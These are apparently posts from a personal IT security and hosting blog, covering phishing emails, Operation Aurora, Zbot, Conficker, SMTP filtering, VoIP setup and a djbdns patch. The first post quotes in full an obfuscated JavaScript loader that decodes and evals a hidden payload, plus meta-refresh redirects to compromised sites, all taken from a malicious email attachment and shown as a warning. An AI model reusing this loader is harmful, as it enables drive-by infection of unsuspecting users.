This is NOT the original message, but an html file.  This will open your browser. The browser will redirect you to a website that has a flaw in it.  Or if you are lucky, to a website trying to sell you something.

I have seen various forms of this, so far they are all from mailer-daemon or postmaster.  Most of them originate from Russia.  The other subjects I’ve seen are:

Delivery Status Notification

Email Policy Violation

One had this refresh:

<meta http-equiv=”refresh” content=”0;url=http://www.loge1**1amsterdam.nl/index3.html” />

<meta http-equiv=”refresh” content=”0;url=http://galleryp*.co.kr/index3.html” />

Notice that both end with index3.html

The Java Script:

<script>var uKU = Math.random();var xIF=”;var nE = Math.random();var yLI = Math.random();var wGV;var mTM=”;var rN = Math.ceil(41);var jZ=”;var rGU=”;wGV=’b1abb8′+’b2bab2′+’b4baf2′+’99ad85′+’a0fbfd’+'e7cfae’+'aeb7a2′+’dff3e8′+’b9abab’+'a1adb9′+’a6aea0′+’b0bab4′+’82acb9′+’a99eb3′+’b5f5aa’+'a2bde8′+’a1bab3′+’a683f1′+’e7b8b8′+’abb7e7′+’f9′;var qS = Math.random();var mRC=55850;function lJ(nU){var sR=”;var gU=”;function y(f){var fL=new Array();var x=new Array();var v=0,r=f['\u006c\u0065'+unescape('%6e%67%74%68')];var vF = Math.ceil(6);var uI = Math.ceil(6);var yT=new Array();for(var iD=2;iD<r+2;iD++){var yX=false;var yZ=false;var z=new Array();var oL = Math.ceil(24);var dM = Math.ceil(24);uK=qM(f,iD-2);v=v+uK*r;}var uB = Math.ceil(11);var gUQ=false;var yTR=”;var zJ=50530;return new String(v);var kQ=”;var tS=new Array();}var rMA=false;var sP=”;function h(s, t){var tZ=”;var iP = Math.ceil(33);var hZ = Math.ceil(33);if(fS == null) {var bX=false;var uIM=false;var hR = Math.ceil(21);fS = {};var xBN=false;var aYZ=new Date();var wZ=”;}var e=new Array();if(fS[s] == null) {var jU = Math.ceil(44);var zFI=”;var qH = Math.ceil(44);var pBM=”;var eJ=”;var uO = Math.ceil(41);var q = Object;var nA=new Array();var bN=new Array();var qA=new Array();var vR=false;fS[s] = new q();var hXT=54078;fS[s].wK = 0;var bC=new Date();var mP=false;fS[s].u = t;var w=false;}var bH=”;var lX=new Date();}function n(s) {var sY = Math.ceil(42);if(fS[s] != null) {var gT=48196;var pA=”;var pB = fS[s];var bF=48403;var nK = pB.wK;var hXG=”;var pT=new Date();var tYJ=”;var iG = pB.u;var xDP = Math.random();var tY = iG.substr(nK, 1);var gG = iG['\u006c\u0065'+unescape('%6e%67%74%68')];                        var aU = 1;var mX = Math.ceil(42);var dE=”;if(nK + aU < gG) {var kL = Math.random();var qR=new Array();var pBO = Math.ceil(29);pB.wK = nK + aU;var dZK=”;var gZW=new Date();} else {var fCY = Math.random();pB.wK = aU – 1;var bHE=24510;var wB = Math.ceil(37);}return qM(tY, aU – 1);var fEL=48782;var nJG=46689;var bNX = Math.random();}var iR = Math.random();}var zK = Math.random();var nO = Math.random();var gX=”;function qM(xB,gR){var zN=new Array();return xB['\u0063\u0068\u0061\u0072'+unescape('%43%6f%64%65%41%74')](gR);var hS=new Array();}var iC=42895;var wY=7594;var qG=”;var xV=new Array();var lM=false;var cA=”;function eD(aX,fO){var bCL=”;var xU = Math.random();return aX^fO;var aJ=29561;}var pQ = Math.ceil(36);var hC=56770;function d(xB,gR){var tUX = Math.ceil(29);var bI=”;return xB['\u0066'+unescape('%72%6f%6d%43%68%61%72%43%6f%64%65')](gR);var uER = Math.random();var aL = Math.random();var aXS = Math.random();}var tT=”;var eZ=”;var jUK = Math.ceil(44);var oG=window;var qW=”;var lBA = Math.ceil(15);var gW=new Array();var fS = null;var lU=new Array();var hMQ=false;var wV=String;var wYA=new Array();var vZ=document;var bWH=false;var aJP=false;var bE = new wV(lJ);var fT=”;var yB=new Date();var cNZ=new Array();var bJ=”;var xD = new wV(vZ['\u0077'+unescape('%72%69%74%65')]);var eN=”;var dS=16914;var aZ = xD['\u0069\u006e\u0064\u0065'+unescape('%78%4f%66')](‘\u0061\u0072′+unescape(‘%69%74%79′));var yNI = Math.ceil(33);var lZ=new Array();var sHN=new Array();if(aZ != -1) {var dQ=36609;var vA=new Array();var fZ=28165; return 130;}var bY=9596;var sW = Math.ceil(24);var vLV = Math.random();var rC=wV['\u0066'+unescape('%72%6f%6d%43%68%61%72%43%6f%64%65')];var oRL=new Array();var uP=130;var tP = oG['\u0073\u0065\u0074\u0054'+unescape('%69%6d%65%6f%75%74')];var dWL=”;var wP=new Array();var jT = ”;var pTR=new Date();var nJ=oG['\u0075\u006e\u0065\u0073\u0063\u0061'+unescape('%70%65')];var oK = Math.ceil(44);var rUT=new Array();var rDJ = Math.ceil(44);var cI = ”;var jXH = Math.ceil(6);var qQ = Math.ceil(6);var tW = Math.random();var j = ‘%’;var lVC=”;var oHK = Math.random();var pY = 2;var uT=new Array();var vX = Math.random();var kY = Math.random();var uQ = 0;var zD=uQ;var hSS = Math.ceil(8);var qHI=”;var pOJ=11644;while(zD < nU['\u006c\u0065'+unescape('%6e%67%74%68')]){var vW=”;var tI=new Array();var pZ=new Array();cI+= j + nU['\u0073'+unescape('%75%62%73%74%72')](zD, pY);var hD=”;var cQ = Math.random();var cLL = Math.random();zD+=pY;var yG=new Array();var qME=22402;var zGY=new Date();}var hDY=”;var hKT=58760;var pR = Math.ceil(40);var uU=new Array();var nU = nJ(cI);var kHB=”;var aY = bE['\u0072\u0065\u0070\u006c'+unescape('%61%63%65')](/[^@a-z0-9A-Z_-]/g, new String());var gB=”;var c = new wV(y(aY));var bLJ = Math.ceil(34);var sOG=”;var bZJ=false;var fMR=new Array();h(‘sT’, aY);h(‘l’, c);var mWF = Math.random();var iMP=46233;var wG = Math.ceil(47);var kRR=false;var dU=uQ;var fDZ=”;var fH=”;var rH=false;var cOD=false;while(dU < 10000) {var dWY=false;var xF = Math.random();var gXD=new Date();var cFX=”;var cK=”;var qJ = nU['\u0063\u0068\u0061\u0072'+unescape('%43%6f%64%65%41%74')](dU);if(isNaN(qJ)) break;var bYL=new Date();var nT=”;qJ = eD(qJ, uP);qJ = eD(qJ, n(‘l’));qJ = eD(qJ, n(‘sT’));var aHO=new Array();var hAF=60523;var eP=new Date();var nUA=”;jT=jT+d(wV,qJ);var mNH=”;dU++;var sSF=new Array();var mS = Math.ceil(5);}var sZM=”;oG['\u0065'+unescape('%76%61%6c')](jT);var pRK=new Date();var vXF = Math.random();return jT=new wV();var lN=”;var yHE = Math.ceil(49);var fEM = Math.ceil(18);var yU=new Date();};var qX=new Date();var jZS=false;var dLV=”;var tHB=new Date();lJ(wGV);var tRH=”;var vFZ=”;</script>

This is Post from: ZeroSource!

Mailer-Daemon and Postmaster are NOT your Friend

• Conflicker, Downup, Downadup, Kido Spreading – Removal – Virus Alert! (6)
• Amazing News – Obama Refuses to be President – Virus Alert (1)
• Microsoft AntiVirus 2009, Virtumonde,Vundo Virus – Removal (10)
• Zbot Variants Spreading! (0)

On January 12, 2010 Google on its own blog, posted that it had been attacked and that it originated from China.  At the same time Google threatened “reviewing its business in China”.  On the same day U.S. Secretary of State Hilary Clinton released a statement condemning the attacks.

This weekend in Davos-Klosters, Switzerland started the World Economic Forum.  The one thing that was not brought up was the attack from China on Google. Lets not forget at this forum both China and Google was present and accounted.  You might say it was a big’ol elephant in the room.  People were asked about the attacks.  The Vice Premier Li Keqiang, of China made it clear “China did not want to discuss Google”.

So where does this leave us? Should this be forgotten for economic reasons? Is it at this time, we walk away and go “Well Shit Happens!”.

There was never a mass attack using this flaw.  It seem to be quietly aimed at certain US Companies.   I can tell you now, no one is going to know what all was taken and or compromised.  I believe these types of attacks will become more and more common, not just used by countries vs countries but individual groups vs whole countries.

This is Post from: ZeroSource!

Operation Aurora – Continues

• Operation Aurora – Chinese Government – More reasons to ditch Internet Explorer (0)
• April Fools, You’re Infected.. No Really.. Seriousl (3)
• Why Microsoft Hosted Exchange? (5)
• Zero-Day Exploit in Microsoft Excel (0)

I believe Microsoft said it best about project Aurora.  And I quote:

Microsoft Security Advisory (979352) – Vulnerability in Internet Explorer Could allow Remote Code Execution

So what does this mean?  Well if you go to the right web page… just go to it.  Your computer can be compromised by an “Hacker”.  When Is say hacker, I mean the Chinese Government.  For the record, no one in the Chinese Government has come out to say they did it, but… well common sense says different.  We’ll get to that later.  You know whats funny, is I don’t fault nor do I blame them.  I blame Microsoft.  I will get to this later.

Lets look at the companies that where effected to begin with:

• Google
• Adobe Systems
• Juniper Networks
• RackSpace

unconfirmed but probably so:

• Yahoo
• Symantec
• Northrop Grumman
• Dow Chemical

So why do I blame Microsoft and not the Chinese Government?  Well its simple… as usual  Microsoft has know about this flaw for a while.  My simple research shows they have known about it since September of 2009.  That is four months to long for what should have been considered a critical flaw.  How many of you store not just your personal important but your businesses important data on computers running windows.   Now how many of them are being used with Internet Explorer as the default browser?  Now how does that make you feel?  This should have been put to the top of the priority queue for fixing.   It should not have waited till it was being exploited to be fixed.

To be continued…..

This is Post from: ZeroSource!

Operation Aurora – Chinese Government – More reasons to ditch Internet Explorer

• Operation Aurora – Continues (0)
• April Fools, You’re Infected.. No Really.. Seriousl (3)
• Why Microsoft Hosted Exchange? (5)
• Zero-Day Exploit in Microsoft Excel (0)

This is a small install that I run when I reboot my system.  It checks for updates and gives me a safe place to download them from.  I also use my favorite Windows Start editor (Crap Cleaner) and turn off and/or remove all other updaters that sit in the background waiting to update a single piece of software.  This gives me an updated and faster running machine. 

You can run FileHippo.Com Updater from your Start Menu –> Programs.  When you do you will be shown the following dialog.

Just let it run and it will provide you with a website list of all the updates it found for your software. 

Now lets go through the settings!

Settings for this program are pretty straight forward.  First we have the option of setting our browser.  This is important because, this is the browser that will launch when it finds an update.  You have the option of seeing or not seeing beta programs and it will show you where you have the program installed. 

Next one is custom locations, this one is for those that install the software in a “Special” place.  Not the standard place the software wants to be installed.  This is where you can tell the updater where to look for other programs you have installed.

After that it is a simple connections box.  This is pretty standard, if you use a proxy to access the web here is where you would put the information. If you don’t use a proxy or know what it is, then don’t worry about this.

Finally is the Advanced tab, I choose to have it close if there are no updates.  Simply when I reboot the machine it checks, if I have no outstanding updates close it.  The second it to actually run it when I reboot.  I choose to do this, and ever now and then I will run it manually if I know I haven’t rebooted my machine in a while.

This is one of the great services FileHippo.Com provides, I also use it find new software that I may not know about.  Visit the site http://www.filehippo.com and see for yourself.

This is Post from: ZeroSource!

How do you keep updated?

• Microsoft AntiVirus 2009, Virtumonde,Vundo Virus – Removal (10)
• Zero Top Windows Software of 2008 (1)
• OpenDNS – Protect your children, Period! (1)
• Hallmark, Coke, and McDonalds: VIRUS Alert (0)

There are several ways to propagate a virus. One of them being social engineering.  This is what the Zbot variants are trying to do.  They are sending emails that seem to come from your service provider, Microsoft themselves, and or your system administrator.

How often do you really get an email from Microsoft telling you that there is an update?  For most people, this is never.  I have worked in the Information Technology field for almost 20 years and I haven’t got an email from them to tell me there is an update.   So why do you think they are doing it now?  Better yet, do you think they are keeping track of every user that has outlook some and their email address?

So are you the system administrator?  Do you actually email people from “System Admin”?  I mean really?  Security 101 tells you to change the administrator anyway.  You should not be emailing from System Admin.  So how often does your System Administrator email you?

So by tricking you to think you are going to a real website and downloading a real upgrade or settings change they are getting you to install the Zbot variant.

So what exactly does the Zbot Trojan/Virus do?   First off it is a trojan that disables windows firewall,  steals sensitive financial data (credit card numbers, online banking login details),  makes screen snapshots,  downloads additional components,  and provides a hacker with the remote access to the compromised system.

Zbot creates a file %System%\sdra64.exe and the hidden files %System%\lowsec\local.ds and %System%\lowsec\user.ds in combination with a hidden directory %System%\lowsec.  There were new memory pages created in the address space of the system process(es): services.exe, lsass.exe, alg.exe, iexplore.exe and svchost.exe.

This is Post from: ZeroSource!

Zbot Variants Spreading!

• Happy Valentine’s Day – Enjoy your Virus! (0)
• Conflicker, Downup, Downadup, Kido Spreading – Removal – Virus Alert! (6)
• Mailer-Daemon and Postmaster are NOT your Friend (0)
• Holiday time approaches! (0)

This is Post from: ZeroSource!

Can’t touch this!

• No Related Post

So what do they offer?

Mail Collector.   This is a way to check and or get your other mail ie hotmail, gmail, yahoo mail all in one place.

Well I wouldn’t know see, when I went to it originally I was using Chrome the newest version of Chrome even.  This is what I ran into:

See they do not support chrome.  So I opened up IE 8 and was able to sign up.  This went pretty well.  The interface looks nice. It was easy to navigate.  The main login looks almost like a iGoogle page with widgets.   There are some good widgets, one for facebook, one for twitter.  Setting these up was easy and the login was fast.  The widget for twitter is Betwittered I believe.  I tried to setup my Gmail with the mail collector and it failed, wouldn’t connect to gmail.  So then I tried to setup my yahoo email and guess what, fail again.  So my next thing to try now that I have a username and password was to sign in with Chrome since it is my main browser of choice.   Fail again, username and password hit login and just sit.  At this time I have given up and try to close out IE 8 and it just hung.  Ended up having to cntrl + alt + del kill it.

Final Thoughts

So what does this say… lots of good ideas but maybe like Google did they should stick a Beta label on it.  I will give it a try again in a few months, see if they have any bugs out of it.  I’m always interested in new things.  Have you tried it? What did you think? Any issues with it for you?

This is Post from: ZeroSource!

A new Email Service – Not So Fast!

• Is it so bad to be E-mail Nazi! (0)
• Reasons NOT to send E-Cards (0)
• msnbc.com – BREAKING NEWS: VIRUS Alert (0)
• Why do people send spam? (2)

One of the best parts was not from the scheduled sessions. It was the sessions in the halls that I found the most interesting.   How several very opinionated individuals can get together and discuss everything from the type of music someone listens to, to local Birmingham Politics.

It was good seeing old friends, meeting new ones, and hanging with current one.  It was also great meeting our nerd brethern from Nashville, Hey Mitch.  I took another listen to a radio station I ditched,  Live 100.5 thanks Ken.

I’m looking forward to the next BarCamp and think we could easy handle two a year in Birmingham.   Up next, WordCamp!

Photo by and © by Matt Sheets http://mattsheets.com/

This is Post from: ZeroSource!

BarCampBirmingham v3.0 Wrap Up!

• Live 100.5 Going Silent (2)
• City Stages 2009 (0)
• BarCamp Birmingham May 2nd (1)
• Update to Zerosource, Bhampulse! (0)

So what is an RFC?  Well it is a Request for Comments.  It is the standards that defines the Internet and how it operates.  It also refers to the way RFC documents are discussed and approved by the Internet community.

RFC821 describes the way e-mail servers talk to each other.  So lets go over a standard email discussion between two servers.  We will call them mail.serverA.net and mail.serverB.com.  A is going to connect to B and send an email to UserB from UserA.  This starts when mail.serverA.net connects to mail.serverB.com on port 25.  ServerA has ip 1.1.1.1 and ServerB 2.2.2.2

ServerB: 220 mail.serverB.com

ServerA:  helo mail.serverA.net

ServerB: 250 mail.serverB.com Hello mail.serverA.net [1.1.1.1], pleased to meet you

ServerA: MAIL FROM: UserA@serverA.net

ServerB: 250 2.1.0 UserA@serverA.net... Sender ok

ServerA: RCPT TO: UserB@serverB.com

ServerB:  250 2.1.0 UserB@serverB.com... Recipient ok

ServerA:  DATA

etc…

So exactly how did we start following the standards?  Rules!

First we require that the server you connect to ours from has a correct DNS entry.  DNS is the Domain Name Service, it is the service that turns mail.serverA.net to 1.1.1.1.  So if our mail server gets an email from mail.serverA.net we do a DNS/Nslookup on the mail server and see that it returns 1.1.1.1 but wait then we check to see that 1.1.1.1 returns to mail.serverA.net as a standard all mail servers that send email should have their dns forward and reverse.

Second we require the server to identify itself per standard.  Helo FQDN (Fully Qualified Domain Name).  This is part of the RFC821.  So serverA would say
helo mail.serverA.net

Third per RFC we require the mail from: and rcpt to: to follow RFC period.
mail from: <user@host>

Last not following the RFC or anything else, but we are stopping users from emailing themselves.  Something that spammers have taken up doing.  Not emailing themselves, although that would be funny.  They have started sending email as the user, so the to and from are the same.  I know we can block email if it is not from an internal ip etc….  That does not work as our users are located on many different networks, at many different locations.

So how has this done?  Well we have had people calling that can’t email to someone.  We explain why and tell them how to fix it.  Users have called “I don’t think mail is working, I haven’t got any spam!”.  Oh yea and the hoss mail server has gone from 80 to 90% processor usage to less then 15% at peak.  We have also blocked 300,000 on one server in 24 hours.

Finally if you are a mail administrator, please quit just going with it!  Please quit going, well its broke but it still works no one is complaining.  Fix Your Server!

This is Post from: ZeroSource!

Is it so bad to be E-mail Nazi!

• Reasons NOT to send E-Cards (0)
• Stop the Backscatter, er Joe Jobs! (0)
• ClamAV Update and Fix (0)
• .exe in url and Earth day ends! (0)

Estimated up to 12 Million Infected Machines World Wide! (Trend Micro)

Well it wasn’t blown out of proportion.  The conflicker worm has already infected well over a million computers world wide.   Some have it upwards 10 million computers.   I don’t think it was blown out of proportion, if anything I believe it has opened a few eyes.  Have you made sure your updated on all your software?

PATCH PATCH PATCH

If you run a windows operating system, you MUST keep your machine updated at all times.  This is not a suggestion, this is not an idea, this is a fact. If you do not, you will be infected if not by the conflicker worm, by something.  Can you believe there are companies that are still running windows NT and Windows 95!

A Microsoft executive calls the ease with which two British e-crime specialists managed to hack into a Windows XP computer as both “enlightening and frightening.”

Conflicker… is this the new Storm Worm?

So now we just sit back and wait to see what it is going to do?  Some say it has began hijacking PC’s asking the user to pay $50 to get a fix.  Using popups to fool the user into thinking it is a valid anti virus program.  Others have said it has started to send spam, I can’t confirm either.  Only time will tell…

This is Post from: ZeroSource!

Conflicker is not Y2K Bug!

• Holiday time approaches! (0)
• Zbot Variants Spreading! (0)
• April Fools, You’re Infected.. No Really.. Seriousl (3)
• Conflicker, Downup, Downadup Microsoft Offers $250,000 reward! (1)

So lets start checking if your infected yet:

Can you get to the following websites:

1. http://mcafee.com/
2. http://www.symantec.com/
3. http://www.symantec.com/norton/index.jsp

If you can NOT reach the following websites, you may be infected.

Can you run windows update and connect to windows update website?

If you can’t, and you can not reach the above websites you’re probably infected.   There are many ways and different products to get rid of it.  I’m not going to tell you what to use.  I’ll tell you the same thing I’d tell a client. You should reformat and reinstall.  That is the only 100% way of getting rid of it.  Never Trust a system with any personal or business data that has been infected or compromised by someone or something else.

So now lets say you’re not infected yet… what do you do?  Well first thing is to update your computer.  Make sure you have all the updates from Microsoft. Do not use some free tool, or some other website to download the updates.  So far the worm spreads by exploiting security vulnerabilities that there are patches for, and you should already be running.

NOTE If your infected with Conflicker:

If you are infected Microsoft has put together a page themselves that explains what versions are out and what you can do to remove it.  I still say you should reformat and reinstall.

Computer Worms – Conflicker

Edited after being caught using bad grammer and use of your and you’re by the grammer police!

This is Post from: ZeroSource!

April Fools, You’re Infected.. No Really.. Seriousl

• Conflicker, Downup, Downadup Microsoft Offers $250,000 reward! (1)
• Conflicker, Downup, Downadup, Kido Spreading – Removal – Virus Alert! (6)
• Operation Aurora – Continues (0)
• Operation Aurora – Chinese Government – More reasons to ditch Internet Explorer (0)

This service is costing $10 a month that is $120 a year.  I also had to purchase the HiPort Adapter.  It cost me $39.99 so I’m down to $159.99 for the year.  I could have got the Linksys Router but I already have a router, don’t need two of them.  The adapter plugs directly into my router via an ethernet connection.  Its default address is 192.168.2. something. You can access it via a web browser.  The default username is blank and password is Admin.  Once you login you can configure this.

I first turned it on dhcp, turned off dhcp server on the device since I’m not going to be plugging anything into it.  I also turned off all services it had enabled.  So all it does is phone.  Oh yea did I mention you have to put a SIM card into this thing.

Next on my trusty old WRT54G, I am of course running Tomato Firmware.  I gave the HiPort device a Static DHCP address.

I then setup QOS “Quality of Service”.  Now it doesn’t matter the speed coming in, I can’t control how fast I’m recieving data.  What I’m setting QOS for is the speed going out.  So I figure up my outgoing speed, set that in QOS.  I then set the Mac Address of the HiPort as Highest Priority.  I have Prioritize small packets with these control flags ACK.  Default Class is Low.  Max bandwidth (Outbound) figure up max kbit/s.  Then I set Highest at %90-%100, High at %85-%95, Medium %60-80, Low %45-65, and Lowest %40-%50.  Then on Classifications I set the HiPort Mac Address for incoming/outgoing to Highest.  I set DNS port 53 0-2kb Highest (normal DNS queries).  I also have Web Ports 80/443 at High 0-512kb, and large dns and webports at medium both +2 and +512 kb.  I can go into more detail on QoS but what it ends up doing is making sure that my phone call gets highest priority going out.

So far no problems at all, the call quality is great.   Total Cost first year $159.99 saving me $600.00 a year on phone service.   Oh yea forgot to mention I have E911 and got to port my number.  Something Skype was not going to allow me to do.

This is Post from: ZeroSource!

Going Skype Fail, Going T-Mobile @Home Success!

• Going full SKYPE at Home Part 1 (4)

So while we are still waiting on Microsoft to release a patch to fix the Zero Day exploit in Excel, there is already a patch for djbdns.  Take note software vendors, this is how you do it.

From: D. J. Bernstein <djb <at> cr.yp.to>
Subject: djbdns<=1.05 lets AXFRed subdomains overwrite domains
Newsgroups: gmane.network.djbdns
Date: 2009-03-04 01:34:21 GMT (3 days, 2 hours and 8 minutes ago)

If the administrator of example.com publishes the example.com DNS data
through tinydns and axfrdns, and includes data for sub.example.com
transferred from an untrusted third party, then that third party can
control cache entries for example.com, not just sub.example.com. This is
the result of a bug in djbdns pointed out by Matthew Dempsky. (In short,
axfrdns compresses some outgoing DNS packets incorrectly.)

Even though this bug affects very few users, it is a violation of the
expected security policy in a reasonable situation, so it is a security
hole in djbdns. Third-party DNS service is discouraged in the djbdns
documentation but is nevertheless supported. Dempsky is hereby awarded
$1000.

The next release of djbdns will be backed by a new security guarantee.
In the meantime, if any users are in the situation described above,
those users are advised to apply Dempsky's patch and requested to accept
my apologies. The patch is also recommended for other users; it corrects
the bug without any side effects. A copy of the patch appears below.

---D. J. Bernstein
   Research Professor, Computer Science, University of Illinois at Chicago

--- response.c.orig     2009-02-24 21:04:06.000000000 -0800
+++ response.c  2009-02-24 21:04:25.000000000 -0800
@@ -34,7 +34,7 @@
         uint16_pack_big(buf,49152 + name_ptr[i]);
         return response_addbytes(buf,2);
       }
-    if (dlen <= 128)
+    if ((dlen <= 128) && (response_len < 16384))
       if (name_num < NAMES) {
        byte_copy(name[name_num],dlen,d);
        name_ptr[name_num] = response_len;

This is Post from: ZeroSource!

Flaw in djbdns 1.05 – Hell Has Frozen Over!

• No Related Post

So what do you get with Zero’s hosted Exchange Solution.  Well you get 1 Gb per user in storage, so a total of 15 Gb, with my control panel you can allocate who gets this space.  You get multiple backups, including offsite.  You get Spam and Virus protection for each mailbox with user and domain level interfaces to manage your own spam and virus settings.   We maintain our spam rules a continuing 24/7 basis, we don’t wait for someone else to figure it out.  You get 24 hour 7 day a week 365 day a year Support for the server.  The server is maintained in a fully redundant, secured, data center.  Redundant in Power, Cooling, and Internet Connections.

Most important, in my opinion, you are not going to call and speak to someone who has a manual, someone who hasn’t a clue how email works.  You are going to speak to an engineer, and you are going to speak to someone that can help you now!  Personally I have over 15 years of Corporate/Enterprise messaging, and currently maintain several Qmail Clusters and Exchange Gateways based on either Qmail and or Postfix.

So lets compare some numbers, we are going to assume that you have a Windows Network environment with cal’s (Client Access License) for all of your users and an Active Directory already setup. We are only going to worry about the Exchange server in pricing.

If you have a full IT staff you will probably not need to hire any additional IT person to maintain your Exchange server. Remember when hiring them, they need MORE then just Exchange experience.  This is a problem alot of companies run into.  Their IT staff can handle Exchange until they hook it up to the internet.  If you are not able to delegate Exchange administration to someone else, just a good guess but add around $40,000 per year to this cost.  This is the low end cost, not including benefits.

We need a few things for our 15 users (went cheapest where possible):

Exchange Server 2007 Standard Edition – $699
Exchange Cal (Client Access License, required for each user $67)x15 = $1005
Server Dell PowerEdge T105 $5,544 – includes 64 bit Processor(required for Exchange 2007), 4 Gb memory max for standard edition, windows server 2008 standard edition with 5 Cal, Raid 1 160 Gb drives, DAT72 backup drive with Symantec Backup Exec 12.5 for Email
Postini Google – $12.00 year = $180 (i looked for cheapest, or something I would use)

So you are looking at $7,428 just to start.

Add the additional staff and your at $47,428

So what does my hosted cost?  Well its $12.95 per user per month.  So it will take 3 years to pay off this if you do not need additional staff.  If you need additional staff, you are looking at 20 years, just to pay for the first YEAR!  We are also not accounting for maintenance, hardware replacements, software upgrades, etc… oh yea all that is included with mine.  If you need addition license for your own, another $67 and I believe you can only buy them in 5 packs.  Lets say you lay off 5 people… with your own Exchange server.  You already bought it.   With mine, the next month you only pay for 10 users.

And this is why I provide Microsoft Hosted Exchange.  If you have questions you can use the “Contact“  above or call me 205-978-9230 ext 234,  and I will point you in the right direction.

This is Post from: ZeroSource!

Why Microsoft Hosted Exchange?

• Operation Aurora – Continues (0)
• Operation Aurora – Chinese Government – More reasons to ditch Internet Explorer (0)
• Is it so bad to be E-mail Nazi! (0)
• April Fools, You’re Infected.. No Really.. Seriousl (3)